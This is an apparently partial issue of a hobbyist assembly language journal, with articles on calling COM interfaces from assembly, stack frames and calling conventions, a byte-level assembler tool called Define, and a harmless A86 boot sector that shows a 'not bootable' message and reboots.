"Writing a Boot Sector in A86"...........................Jan Verhoeven

"A Basic Virus Writing Primer"...................................Chili

Column: Win32 Assembly Programming
     "Mouse Input....".........................................Iczelion
     "Menus"...................................................Iczelion

Column: The C standard library in Assembly
     "C string functions:_strtok"................................Xbios2

Column: The Unix World
     "Using Menus in Xt"........................................mammon_

Column: Assembly Language Snippets
     "Triple XOR".........................................Jan Verhoeven
     "Trailing Calls".....................................Jan Verhoeven

Column: Issue Solution
     "Fire Demo"....................................................iCE
----------------------------------------------------------------------
        +++++++++++++++++++++Issue  Challenge+++++++++++++++++++
        Write a "Fire Demo"-style program in less than 100 bytes
----------------------------------------------------------------------


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by mammon_


In the last few months I have come across a number of links to APJ, and have
received the proverbial ton of email regarding it. Strangely enough, the
majority of these tend to agree that the one problem with the journal is its
infrequent --if not irregular-- publication. If that is the only complaint so
far, I think I can cope with it ;)

This issue is, naturally, very late due to what could be called "real world"
[lit., "that which does not go away when a power outtage kills your PC"]
considerations; however the articles by weight alone should make up for some
of this.

The largest of the bunch is undoubtedly the virus writing tutorial by Chili,
who may have beat my previous record for article length: a very thorough work,
worth reading just to help protect against virii, if not to write them. This
is accompanied by Jan's discussion of boot sector programming...a suitable
companion article, I believe.

High-level coders will undoubtedly be interested in Lord Lucifer's article on
COM programming in assembly; it seems that high-level areas such as COM,
DirectDraw, and Winsock coding are starting to receive a fair degree of
attention from the assembly language world, judging from the tutorials I have
been coming across.

Xbios2 has continued his excellent C stdlib work, and Icezlion has contributed
two more of his now-legendary Win32 asm tutorials; I of course have kept up
the Unix vanguard with yet another Xt article.

This month's challenge was contributed by iCE, and had a .text-size I could
not readily beat.

A few brief notes concerning the web page: I have thrown together a basic
collection of assembly language links at
         http://asmjournal.freeservers.com/lynx.html
Submissions for this links page are welcome. I have also been getting a few
emails to the APJ inbox asking or offering help with assembly language; since
I check the inbox fortnightly at best, I have added a "classified ads" page to
the APJ website at
         http://www.guestbook4free.com/en/28806/entries/
which is essentially a guestbook where people can post contact info, projects
they need help with, etc ... more or less a one-way bulletin board like, well,
like classified ads are.

That should just about wrap things up. Enjoy the issue!

_m


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                  Using COM in Assembly Language
						  by Lord Lucifer


This article will discuss how to use COM interfaces in your assembly language
programs.  It will not discuss what COM is and how it is used, but rather how
it can be used when programming in assembler.  It will discuss only how to
use existing interfaces, and not how to actually implement new ones; this will
be shown in a future atricle.


About COM
------------------------------------------------------------------------------

Here is a brief introduction to the basics behind COM.

A COM object is one in which access to an object's data is achieved
exclusively through one or more sets of related functions. These function
sets are called interfaces, and the functions of an interface are called
methods. COM requires that the only way to gain access to the methods of an
interface is through a pointer to the interface.

An interface is actually a contract that consists of a group of related
function prototypes whose usage is defined but whose implementation
is not. An interface definition specifies the interface's member functions,
called methods, their return types, the number and types of their parameters,
and what they must do. There is no implementation associated with an
interface. An interface implementation is the code a programmer supplies to
carry out the actions specified in an interface definition.

An instance of an interface implementation is actually a pointer to an array
of pointers to methods (a function table that refers to an implementation of
all of the methods specified in the interface). Any code that has a pointer
through which it can access the array can call the methods in that interface.



Using a COM object assembly language
-------------------------------------------------------------------------------

Access to a COM object occurs through a pointer.  This pointer points to a
table of function pointers in memory, called a virtual function table, or
vtable in short.  This vtable contains the addresses of each of the objects
methods. To call a method, you indirectly call it through this pointer table.

Here is an example of a C++ interface, and how its methods are called:

         interface IInterface
         {
              HRESULT QueryInterface( REFIID iid, void ** ppvObject );
              ULONG AddRef();
              ULONG Release();
              Function1( INT param1, INT param2);
              Function2( INT param1 );
         }

         // calling the Function1 method
         pObject->Function1( 0, 0);

Now here is how the same functionality can be implemented using assembly
language:

         ; defining the interface
         ; each of these values are offsets in the vtable
         QueryInterface          equ             0h
         AddRef                  equ             4h
         Release                 equ             8h
         Function1               equ             0Ch
         Function2               equ             10h

         ; calling the Function1 method in asm
         ; the method is called by obtaining the address of the objects
         ; vtable and then calling the function addressed by the proper
         ; offset in the table
         push    param2
         push    param1
         mov     eax, pObject
         push    eax
         mov     eax, [eax]
         call    [eax + Function1]

You can see this is somewhat different than calling a function normally.
Here, pObject points to the Interface's vTable.  At the Function1(0Ch) offset
in this table is a pointer to the actual function we wish to call.



Using HRESULT's
-------------------------------------------------------------------------------

The return value of OLE APIs and methods is an HRESULT. This is not a handle
to anything, but is merely a 32-bit value with several fields encoded in the
value.  The parts of an HRESULT are shown below.

HRESULTs are 32 bit values layed out as follows:

  3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1
  1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
+-+-+-+-+-+---------------------+-------------------------------+
|S|R|C|N|r|    Facility         |               Code            |
+-+-+-+-+-+---------------------+-------------------------------+

  S - Severity Bit
      Used to indicate success or failure
      0 - Success
      1 - Fail

      By noting that this bit is actually the sign bit of the 32-bit value,
      checking success/failure is simply performed by checking its sign:

      call       ComFunction        ; call the function
      test       eax,eax            ; now check its return value
      js         error              ; jump if signed (meaning error returned)
      ; success, so continue

  R - reserved portion of the facility code, corresponds to NT's
      second severity bit.

  C - reserved portion of the facility code, corresponds to NT's
      C field.

  N - reserved portion of the facility code. Used to indicate a
      mapped NT status value.

  r - reserved portion of the facility code. Reserved for internal
      use. Used to indicate HRESULT values that are not status
      values, but are instead message ids for display strings.

  Facility - is the facility code
      FACILITY_WINDOWS    = 8
      FACILITY_STORAGE    = 3
      FACILITY_RPC        = 1
      FACILITY_WIN32      = 7
      FACILITY_CONTROL    = 10
      FACILITY_NULL       = 0
      FACILITY_ITF        = 4
      FACILITY_DISPATCH   = 2

      To retreive the Facility,

      call       ComFunction    ; call the function
      shr        eax, 16        ; shift the HRESULT to the right by 16 bits
      and        eax, 1FFFh     ; mask the bits, so only the facility remains
      ; eax now contains the HRESULT's Facility code

  Code - is the facility's status code

      To get the Facility's status code,
      call       ComFunction             ; call the function
      and        eax, 0000FFFFh          ; mask out the upper 16 bits
      ; eax now contains the HRESULT's Facility's status code



Using COM with MASM
------------------------------------------------------------------------------
If you use MASM to assemble your programs, you can use some of its
capabilities to make calling COM functions very easy.  Using invoke, you can
make COM calls look almost as clean as regular calls, plus you can add type
checking to each function.


Defining the interface:

      IInterface_Function1Proto     typedef proto :DWORD
      IInterface_Function2Proto     typedef proto :DWORD, :DWORD

      IInterface_Function1          typedef ptr IInterface_Function1Proto
      IInterface_Function2          typedef ptr IInterface_Function2Proto

      IInterface struct DWORD
            QueryInterface          IUnknown_QueryInterface         ?
            AddRef                  IUnknown_AddRef                 ?
            Release                 IUnknown_Release                ?
            Function1               IInterface_Function1            ?
            Function2               Interface_Function2             ?
      IInterface ends

Using the interface to call COM functions:

      mov     eax, pObject
      mov     eax, [eax]
      invoke  (IInterface [eax]).Function1, 0, 0

As you can see, the syntax may seem a bit strange, but it allows for a simple
method using the function name itself instead of offsets, as well as type
checking.



A Sample program written using COM
------------------------------------------------------------------------------

Here is some sample source code which uses COM written in straight assembly
language, so it should be compatable with any assembler you prefer with only
minor changes necessary.

This program uses the Windows Shell Interfaces to show the contents of the
Desktop folder in a window.  The program is not complete, but shows how the
COM library is initialized, de-initialized, and used. I also shows how the
shell library is used to get folders and obcets, and how to perform
actions on them.


..386
..model flat, stdcall

include windows.inc             ; include the standard windows header
include shlobj.inc              ; this include file contains the shell namespace
                                 ; definitions and constants

;----------------------------------------------------------
..data
         wMsg                    MSG     <?>
         g_hInstance             dd      ?
         g_pShellMalloc          dd      ?

         pshf                    dd      ?       ; shell folder object
         peidl                   dd      ?       ; enum id list object

         lvi                     LV_ITEM <?>
         iCount                  dd      ?
         strret                  STRRET  <?>
         shfi                    SHFILEINFO <?>
         ...

;----------------------------------------------------------
..code
; Entry Point
start:
     push    0h
     call    GetModuleHandle
     mov     g_hInstance,eax

     call    InitCommonControls

; initialize the Component Object Model(COM) library
; this function must be called before any COM functions are called
     push    0
     call    CoInitialize
     test    eax,eax                         ; error when the MSB = 1
                                             ; (MSB = the sign bit)
     js      exit                            ; js = jump if signed

; Get the Shells IMalloc object pointer, and save it to a global variable
     push    offset g_pShellMalloc
     call    SHGetMalloc
     cmp     eax, E_FAIL
     jz      shutdown


; here we would set up the windows, list view, message loop, and so on....
; we would also call the FillListView procedure...
; ....


; Cleanup
; Release IMalloc Object pointer
     mov     eax, g_pShellMalloc
     push    eax
     mov     eax, [eax]
     call    [eax + Release]         ; g_pShellMalloc->Release();

shutdown:
; close the COM library
     call    CoUninitialize

exit:
     push    wMsg.wParam
     call    ExitProcess
; Program Terminates Here


;----------------------------------------------------------
FillListView proc

; get the desktop shell folder, saved to pshf
     push    offset pshf
     call    SHGetDesktopFolder

; get the objects of the desktop folder using the EnumObjects method of
; the desktop's shell folder object
     push    offset peidl
     push    SHCONTF_NONFOLDERS
     push    0
     mov     eax, pshf
     push    eax
     mov     eax, [eax]
     call    [eax + EnumObjects]

; now loop through the enum id list
idlist_loop:
; Get next id list item
     push    0
     push    offset pidl
     push    1
     mov     eax, peidl
     push    eax
     mov     eax, [eax]
     call    [eax + Next]
     test    eax,eax
     jnz     idlist_endloop

     mov     lvi.imask, LVIF_TEXT or LVIF_IMAGE
     mov     lvi.iItem,

; Get the item's name by using the GetDisplayNameOf method
     push    offset strret
     push    SHGDN_NORMAL
     push    offset pidl
     mov     eax, pshf
     push    eax
     mov     eax, [eax]
     call    [eax + GetDisplayNameOf]
; GetDisplayNameOf returns the name in 1 of 3 forms, so get the correct
; form and act accordingly
     cmp     strret.uType, STRRET_CSTR
     je      strret_cstr
     cmp     strret.uType, STRRET_OFFSET
     je      strret_offset

strret_olestr:
     ; here you could use WideCharToMultiByte to get the string,
     ; I have left it out because I am lazy
     jmp     strret_end

strret_cstr:
     lea     eax, strret.cStr
     jmp     strret_end

strret_offset:
     mov     eax, pidl
     add     eax, strret.uOffset

strret_end:
     mov     lvi.pszText, eax

; Get the items icon
     push    SHGFI_PIDL or SHGFI_SYSICONINDEX or SHGFI_SMALLICON or SHGFI_ICON
     push    sizeof SHFILEINFO
     push    offset shfi
     push    0
     push    pidl
     call    SHGetFileInfo
     mov     eax, shfi.iIcon
     mov     lvi.iImage, eax

; now add item to the list
     push    offset lvi
     push    0
     push    LVM_INSERTITEM
     push    hWndListView
     call    SendMessage

; repeat the loop
idlist_endloop:

; now free the enum id list
; Remember all allocated objects must be released...
     mov     eax, peidl
     push    eax
     mov     eax,[eax]
     call    [eax + Release]

; free the desktop shell folder object
     mov     eax, pshf
     push    eax
     mov     eax,[eax]
     call    [eax + Release]

     ret
FillListView endp


END start


Conclusion
-------------------------------------------------------------------------------

Well, that is about it for using COM with assembly language.  Hopefully, my
next article will go into how to define your own interfaces.  As you can
see, using COM is not difficult at all, and with it you can add a very
powerful capability to your assembly language programs.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                Stack Frames and High-Level Calls
                                                by mammon_


Last month I covered how to implement high-level calls in Nasm. Since then it
has come to my attention that many beginning programmers are unfamiliar with
calling conventions and the stack frame; to remedy this I have prepared a brief
discussion of these topics.

The CALL Instruction
--------------------
At its most basic, an assembly language call takes this for:
	 push [parameters]
	 call [address]
Some assemblers will require that the CALL statement take as an rgument only
addresses leading to external functions or addresses created with a macro or
directive such as PROC. However, as a quick glance through a debugger or a
passing familiarity with Nasm will demonstrate, the CALL instruction simply
jumps to an address [often a label in the source code] while pushing the
contents of EIP [containing the address of the instruction following the call]
onto the stack. The CALL instruction is therefore equivalent to the following
code:
	 push EIP
	 jmp  [address]

The address that has been called will thefore have the stack set up as follows:
	 [Last Parameter Pushed]: DWORD
	 [Address of Caller]    : DWORD
	 ---  "Top" of Stack [esp]  ---
At this point, anything pushed onto the stack will be on top of [that is, with a
lower memory address, since the stack "grows" downwards] the return address.

The Stack Frame
---------------
Note that the parameters to the call therefore cannot be POPed from the stack,
as this will destroy the saved return address and thus cause the application to
crash upon returning from the call [unless, of course, a chosen return address
is PUSHed onto the stack before returning from the call]. The logical way to
reference these parameters, then, would be as offsets from the stack pointer:
     [parameter 2]      : DWORD esp + 8
     [parameter 1]      : DWORD esp + 4
     [Address of Caller]: DWORD esp
     -----  "Top" of Stack [esp]  -----
In this example, "parameter 1" is the parameter pushed onto the stack last, and
"parameter 2" is the parameter pushed onto the stack before parameter 1, as
follows:
	 push [parameter 2]
	 push [parameter 1]
	 call [procedure]
The problem with referring to parameter as offsets from esp is that esp will
change whenever a value is PUSHed onto the stack during the routine. For this
reason, it is standard for routines which take parameters to set up a "stack
frame".

In a stack frame, the base pointer [ebp] is set equal to the stack pointer [esp]
at the start of the call; this provides a "base" address from which parameters
can be addressed as offsets. It is assumed that the caller had a stack frame
also; thus the value of ebp must be preserved in order to prevent causing damage
to the caller. The stack frame usually takes the following form:
	 push ebp
	 mov  ebp, esp
	 ... [actual code for the routine] ...
	 mov  esp, ebp
	 pop  ebp
This means that once the stack frame has been entered, the stack has the
following structure:
     [parameter 2]      : DWORD ebp + 12
     [parameter 1]      : DWORD ebp + 8
     [Address of Caller]: DWORD ebp + 4
     [Old Base Pointer] : DWORD ebp
     -----   Base Pointer [ebp]   -----
     -----  "Top" of Stack [esp]  -----
The use of the base pointer also allows space to  be allocated on the stack for
local variables. This is done by simply subtracting bytes from esp; since esp is
restored when the stack frame is exitted, this space will automatically be
deallocated. The local variables are then referred to as *negative* offsets from
ebp; these may be EQUed to meaningful symbol names in the source code. A routine
that has 3 local DWORD variables would take the following form:
      Var1 EQU [ebp-4]
      Var2 EQU [ebp-8]
      Var3 EQU [ebp-12]  ;provide meaningful names for the variables
	 push ebp
	 mov  ebp, esp
	 sub  esp, 3*4    ;3 DWORDs at 4 BYTEs apiece
	 ... [actual code for the routine] ...
	 mov  esp, ebp
	 pop  ebp
This routine would then have the following stack structure after the allocation
of the local variables:
     [parameter 2]      : DWORD ebp + 12
     [parameter 1]      : DWORD ebp + 8
     [Address of Caller]: DWORD ebp + 4
     [Old Base Pointer] : DWORD ebp
     -----   Base Pointer [ebp]   -----
     [Var1]             : DWORD ebp - 4
     [Var2]             : DWORD ebp - 8
     [Var3]             : DWORD ebp - 12
     -----  "Top" of Stack [esp]  -----

The stack frame has can also be used to provide a call trace, as it stores the
base pointer of [and thus a pointer to the caller of] the caller. Assume that a
program has the following flow of execution:
proc_1: push dword call1_p2
	 push dword call1_p1
	 call proc_2
________proc_2: push call2_p1
		 call proc_3
________________proc_3: push call3_p1
			 call proc_4
Upon creation of the stack frame in proc_4, the stack has the following
structure:
     [call1_p2]             : DWORD ebp + 36
     [call1_p1]             : DWORD ebp + 32
     [Return Addr of Call1] : DWORD ebp + 28
     [Old Base Pointer]     : DWORD ebp + 24
     ----  Base Pointer of Call 1  ----
     [call2_p1]             : DWORD ebp + 20
     [Return Addr of Call2] : DWORD ebp + 16
     [Base Pointer of Call1]: DWORD ebp + 12
     ----  Base Pointer of Call 2  ----
     [call3_p1]             : DWORD ebp + 8
     [Return Addr of Call3] : DWORD ebp + 4
     [Base Pointer of Call2]: DWORD ebp
     -----   Base Pointer [ebp]   -----
     -----  "Top" of Stack [esp]  -----
As you can see, for each previous call the return address is [ebp+4], where ebp
is the address of the saved base pointer for the call previous to that one.
Thus, if one could traverse the history of stack frames as follows:
	 mov eax, ebp  ; eax = address of previous ebp
	 mov ecx, 10  ; trace the last 10 calls
loop_start:
	 mov ebx, [eax+4] ; ebx = return address for call
	 call print_stack_trace
	 mov eax, [eax]  ; step back one stack frame
	 loop loop_start
This is exceptionally useful for exception handling; the handling function will
be able to print out a stack history to aid debugging. This principle can also
be applied in conjunction with debugging code [for example, the Win32 debug API]
to create a utility which will trace the calls [in reality, the stack frames of
the calls] made by a target. Essentially, this would boil down to the following
logic:
	 1) Breakpoint on changes to EBP
	 2) On Break, get return address [ebp+4]
	 3) Get instruction prior to return address
	 4) Print or log the instruction
Note that this can be enhanced to resolves symbol names in the logged CALL
instruction, such that local or API address labels [e.g. GetWindowTextA] can be
logged rather than just the address itself.

The ENTER Instruction
---------------------
The ENTER instruction is used to create a stack frame with a single instruction;
it is equivalent to the code
	 push ebp
	 mov  ebp, esp
The ENTER instruction takes a first parameter that specifes the number of bytes
to reserve for local variables; an optional second parameter gives the nesting
level [0-31] of the current stack frame in the overall program structure. This
is often used by high-level languages to save call trace information for error
handlers, as it specifies the number of additional [previous] stack frame
pointers
to save on the stack.

The RET Instruction
-------------------
Any routine which is accessed by a CALL instruction must be terminated with a
return [RET] instruction. As one can see from the operation of the CALL
instruction, if you were to attempt to circumvent the RET instruction by JMPing
to the retrun address, the stack would still be corrupted. The RET statement is
roughly equivalent to the following code:
	 pop  EIP

Note that the RET must take place after exiting the stack frame in order to
avoid corruption of the stack.

The LEAVE Instruction
---------------------
The LEAVE instruction is used to exit a stack frame created with the ENTER
instruction; it is equivalent to the code
	 mov  esp, ebp
	 pop  ebp
The LEAVE instruction takes no parameters and still requires a RET statement to
follow it.

High-level Language Calling Conventions
---------------------------------------
At this point one may wonder what has happened to the parameters pushed onto the
stack prior to the call. Are they still on the stack after the RET, or have they
been cleared? Since the parameters cannot be POPed from the stack while within
the call, they still are on the stack at the RET instruction.

At this point the programmer has two options.  They can have the caller clean up
the stack by adding the number of bytes pushed to esp immediately after the
call:
	 push dword param2
	 push dword param1
	 call procedure
	 add  esp, 2 * 4 	 ;2 DWORDs at 4 BYTEs apiece
Or they can clear the stack by passing to the RET instruction the number of
bytes that need to be cleared:
	 push dword param2
	 push dword param1
	 call procedure
	 ...
procedure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret  8 		 ;2 DWORDs at 4 BYTEs apiece
Which method is chosen is left up to the programmer; however, when writing a
library or API, one must make clear who is responsible for cleaning up the
stack. In addition, when interfacing with high-leve languages, one also has to
make clear which order the parameters are to be pushed in. For this reason there
are calling conventions for the high-level languages.

The C calling convention is used to interface with the C and C++ programming
languages; it is used in the standard C library and in Unix APIs. It pushes the
parameters from right to left, and does not clean up the stack upon return from
the call. A call to a C-style routine would look as follows:
	 ;corresponds to the C code
	 ;procedure(param1, param2)
	 push dword param2
	 push dword param1
	 call procedure
	 add  esp, 8
A C-style routine would have the following structure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret

The Pascal calling convention is used interface with the Pascal, BASIC, and
Fortran programming languages; it is used in the Win16 API. It pushes the
parameters
from left to right, and cleans up the stack upon return from the call; as such
it is the opposite of the C convention. A call to a Pascal routine would look as
follows:
	 ;corresponds to the C code
	 ;procedure(param1, param2)
	 push dword param1
	 push dword param2
	 call procedure
A Pascal-style routine would have the following structure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret 8  ;clear the 2 dword parameters

The Stdcall ["standard call" or __stdcall] calling convention is a combination
of the C and Pascal conventions; it is used in the Win32 API. It pushes the
parameters from right to left, and cleans the stack upon return from the call. A
call to a Stdcall routine would look as follows:
	 ;corresponds to the C code
	 ;procedure(param1, param2)
	 push dword param2
	 push dword param1
	 call procedure
A Stdcall-style routine would have the following structure:
	 push ebp
	 mov  ebp, esp
	 ...
	 mov  esp, ebp
	 pop  ebp
	 ret 8

There is also a Register calling convention [also called "fastcall"] which uses
registers rather than the stack to pass parameters. The first parameter is
passed in eax, the second in EDX, and the third in EBX; subsequent parameters
are passed via the stack. A call to a Register routine would look as follows:
	 ;corresponds to the C code
	 ;procedure(param1, param2, param3)
	 mov  eax, param1
	 mov  edx, param2
	 mov  ebx, param3
	 call procedure
Note that there is no defined standard method of clearing the stack ro the
Register convention; however most implemntations clear the stack in the Pascal
style.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                              Define Your Memory
                                                              by Alan Baylis


[I am going to preface this article with a brief note, since it is not
  covering assembly language per se, but rather a utility that will be of use
  to asm coders. The author sums it up well in his original email to me:
   "Define is a new type of assembler/disassembler that does not use source
    code. The program reads the byte values in memory and checks a library to
    find a definition that describes the byte values it reads. The library can
    be added to and is used as a permanent macro list to write instuctions,
    functions, etc to memory. Most assemblers also use standard 3 character
    mnemonics to descibe the instruction set, however, with Define you can
    rename the instructions and your own macros to anything and up to 250
    characters."
  Sounds pretty promising.
   _m                    ]


For the x86 series of processor I have been working on a new type of assembler
and have
written a program called Define. The program could be called a sketch of what a
future
version might be like. The program is fully workable but suffers from a few
limitations,
the first is that it is written in QBASIC which may be a blow to devoted machine
coders,
and the second is that it can only comfortably use about three hundred
definitions
(Definitions are like a library of machine code macros and I'll discuss them
more fully
later) and a third limitation, not to its functionality, is that the program
doesn't have
a quick mouse and menu driven interface, but I'm working on it.

I liked the idea of macros and saw the neccessity for using them so that I and
others
don't have to "reinvent the wheel" as it has been put, but I wanted a way to see
the
machine code instructions and the byte values that made up the macro. This can't
be done
through using source code as the finished code is generated at the discretion of
the
compilers authors and requires a debugger to verify its content.

To make what was originally intended to be a debugger but without the source
code I
decided to make a program that could read memory and interpret the byte values
it finds
into their mnemonic equivalents or better (much like a debugger), so that while
reading
memory, if the program found the byte value 205 followed by the value 5 it would
display
"INT 5". To do this I needed what I termed a 'definiton' which included the byte
values
that make up an instruction or small macro and included a description or name
for the
function they perform.

Unlike what I had done with a previous assembler I decided to put the
definitions in a
separate file rather than include them as data within the main program, this
allowed
for the addition or removal of future definitions. I then quickly realised that
since
these definitions contained the byte values of an instruction, then they could
also be
used to write the bytes into memory. I added  functions to save and load
programs as
well as functions to manipulate the definition file and the program was
underway.

I found while writing the definitions for the instruction set that it would be
good
(and necessary) if the program could read an instruction even if one of the
bytes is
unknown or variable; I decided to call these bytes undefined bytes, so that if
the
program found the number 205 it would display something like "Interrupt call"
regard-
less of what number followed.

While reading memory I also wanted a way to exclude data areas from being
interpreted
into definitions, so I added a new definition type called addresses which
contain the
address of the first and last bytes of a data area and a name to describe the
data area.
If these are turned on in the program then they are used instead of the normal
definitions
when reading that part of memory.

To then take Define closer to being an assembler rather than a debugger I also
included
labels that label memory addresses and the destination of jump and branch
instructions.

I envision that a future version of Define written in machine code or a similar
program
will have a pop up list of definitons and use a point and click method of
writing the
code as opposed to the current method of scrolling through them from a different
page.
The future version will also need to be able to handle thousands of definitions
as
opposed to the few hundred it can use at a time now, in order to accommodate
situations
such as the following:

To call the interrupt 21h,9 which prints a string it is necessary to put the
function
number 9 in AH and the address of the string in the registers DS:DX and then
call the
interrupt,

MOV AH,9
MOV DX,address
INT 21h

however it is also valid to put the number 9 in AH after the address of the
string has
been put in DS:DX,

MOV DX,address
MOV AH,9
INT 21h

To make a definition for this interrupt at least two definitions will need to be
made
and therefore a larger definition file. This also doesn't account for the
situation in
which the number 9 may have been filled three instructions earlier and is
assumed to be
correct at the time when the interrupt is called, in this case only the
definitions for
the instructions will be seen and not a definition for the interrupt.

One of the best aspects to Define in my book is that the memory can be viewed
according
to a persons level of understanding (or will be as the definitions are written,)
for
example the program is able to only show definitions of a certain level and no
other. I
have chosen to represent the level of a definition by its color, I have used
blue (1)
for the lowest level which are the instruction set definitions and then green
(2) for
the next level which are the DOS, BIOS, etc definitions and then magenta (3) for
the
next level which may be definitions to clear the screen and print the date
combined and
so on, so that a person who knows little about machine code may set the maximum
definition
color to red (4) and still be able to write a program using Define. The
advantage for
those who know machine code is that they need not be restricted to only a high
level
definition, by turning the observance of the color off they can press the letter
B when
viewing a  high level definition and see the lower level definitions that make
up the
higher one. By repeatedly pressing B they can view the program as level 1 (blue)
or even
as the byte values themselves.

The most radical departure from most assemblers is that when writing a program
the program
is composed in memory,  the byte values of the definitions are written directly
to an
unused or reserved area of memory where they can be further altered directly
while
reading memory. This could also be said to be the most dangerous method as it
can easily
lead to the accidental writing of other areas of memory, while this is true I
have also
found a benefit, if Define is stopped and then restarted the program being
written will
still be in memory without having been saved (depending on where in memory the
program is
being written.)

The maker of a violin, while demonstrating it, must have said at one time or
another "A
good violinist could really show you how to play it", I too like the maker of a
violin am
sure there are better definition writers than myself. To become a high level
language the
high level definitions need to be written and I ask any person who has a passion
for writing
hand written code to send me a definition or two to include in the definition
file.


You can download Define from my homepage at
	 http://members.net-tech.com.au/alaneb/default.htm
and there is a step by step guide to using the program in the zip file called
manual.doc.

Please send any definitions or reponse to Alan at alien1_3@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                     Writing a Boot Sector in A86
                                                     by Jan Verhoeven


I have been coding for FreeDOS some time, but that is a C project and I
rather hate C. It is so clumsy. That's also why I always code in A86
assembly language. The "No Red Tape" assembler that makes life a lot
easier for programmers.

A86 is good. The debugger (D86) could be better, but not too much. I
registered my version and I want to encourage everyone to follow my
lead. The software is good enough to pay for it. And it ensures proper
development of the software. If you can spare 20 bucks a month for the
ISP, you should also spend this on quality software.
During the last two years I have been submiutting bugs to Isaacson and
all of them have been fixed in the latest version (4.03).

Besides A86 being the best assembler around, it has some idiosyncracies
to which some people need to get used to. Plus my personal preferences,
which might add to that...

  - When I refer to a memory location I use square brackets.
  - I use single quotes for texts
  - I use most of the A86 features.

Some of the A86 features are:

  - very powerful macro language
  - numbers starting with a ZERO are ALWAYS hex, no matter how they end
  - easy IF statements to reduce nonsense labelnames
  - local labels, like below: only two local labels.

I started out on the Z-8000, back in 1981, switched to the Z-80, Z-8,
8086, PIC 16Cxx, some 8051 (Barffff), some 68K (yummie yummie). Mainly
in ASM and else in Modula-2. I have some really cool and useful routines
lying around for DOS. And I'm gonna share them with the world.

The following code is a bootsector which can be used for noon-bootable
disks. In this case for a 1.44 Mb floppy disk. You could use it to make
a commercial out of every non-bootable disk.

First the code:

----- Code file -------------------------------------------------
name     flopnb
title    Floppy disk boot sector, non-bootable, 1.44 Mb
page     80, 120

; version 1.0  : It works                               : OK 12-12-1998

lf       = 10
cr       = 13

          org   0

          jmp   short main       ; this is critical!
          nop                    ; and this too!
; ----------------------

OEMname  db    'StupiDOS'
BpS      dw    512              ; bytes per sector
SpA      db    1                ; sectors per allocation unit (=cluster)
ResSect  dw    1                ; reserved sectors, starting from sector 0
NrFats   db    2                ; number of FAT's on this disk
FiR      dw    224              ; number of entries in ROOT directory
Total    dw    2880             ; number of sectors per disk
ToM      db    0F0              ; Type of Media
SpF      dw    9                ; Sectors per Fat
SpT      dw    18               ; sectors per Track
Heads    dw    2                ; number of heads
Hidden   dw    0, 0             ; Hidden sectors
GrandTot dd    0                ; total for disks over 32 Mb
IntId    db    0, 0
BootSign db    029              ; extended boot signature
VolumeID dd    0566E614A        ; serial number ...
DiskLabl db    'DOS is MINE'    ; volume label
FATtype  db    'FAT-12  '       ; FAT type
          db    'VeRsIoN=1.0', 0 ; for version control only
; ----------------------

L1:      push  si               ; stack up return address
          ret                    ; and jump to it

print:   pop   si               ; this is the first character
          mov   bx, 0            ; video page 0
L0:      lodsb                  ; get token
          cmp   al, 0            ; end of string?
          je    L1               ; if so, exit
          mov   ah, 0E           ; else print it
          int   010              ; via TTY mode
          jmp   L0               ; until done
; ----------------------

main:    cld                    ; init direction flag
          cli                    ; take care of 1 faulty batch of 88's in 1980
          mov   ax, 07C0         ; this is the segmentvalue at start
          mov   ds, ax           ; store it in DS, ES
          mov   es, ax
          mov   ax, 0            ; clear ax ...
          mov   ss, ax           ; ... to prime the SS register
          mov   sp, 07C00        ; set stackpointer
          sti                    ; OK, interrupts may come again
          call  print            ; show that message
          db    cr
          db    'This is not a bootable floppy. '
          db    'Please strike any key to reboot.', cr, lf
          db    'This floppy disk is formatted by FreeDOS', cr, lf, lf
          db    'Please visit us at www.freedos.org', cr, lf, 0

L0:      mov   ah, 1            ; wait for keypress by ...
          int   016              ; ...  interrogating keyboard
          jz    L0               ; if no key pressed, loop back
          mov   ax, 0            ; else address system variables
          mov   es, ax           ; in order to ...
       es mov   w [0472], 01234  ; signal: NO POST and go on ...
          jmp   0FFFF:0000       ; with the next reboot

          org   01FE             ; look for the dotted line and ...
          db    055, 0AA         ; ... don't forget to sign!

------------------------------------------------- Code file -----

The first three lines are straightforward: name, title and page. Not
much to tell about that. Then some version info for the programmer, some
equates and the ORG statement.

If no ORG is supplied, A86 will assume it is ORG 0100. I ordered an ORG   0,
which means several things:

  - start assembly at address 0
  - the output file will be called *.BIN

Bootsectors must start with some particular bytes. Therefore the first
three bytes need to be either a short jump, a variable offset plus a
NOP. Or a (long) jump without a NOP.

At offset 03 of the bootsector starts the DPB (Disk Parameter Block)
which tells the OS what kind of disk this is. It starts off with an OEM
name. Please put ASCII in there, or virus scanners might trip on it with
a "Bloodhound warning".

After the description of the geometry of this disk, I included an
extended boot signature, since we have ample room left. It contains
Volume ID, Disk Label, and FAT-type strings.

The PRINT subroutine is a nice one. It will print the ASCIIZ string that
follows it. This is quite a handy routine since you can simply change
messages without having to worry about the address and length of the
actual message.

Print is called like this:

         call   print
         db     'Hello World', cr, lf, 0
         ...

Print takes the "return address" off the stack. This of course is no
return address but the address of the message. What follows is easy:

  - get next character
  - IF  (non-zero)  print character  ELSE  leave loop  ENDIF
  - the current si pointer is the actual return address... So we push it
  - and return to caller.

Perhaps a jmp  si could be possible too, but I like clear code, in most
cases. If you need obfuscated code, switch to C. :)

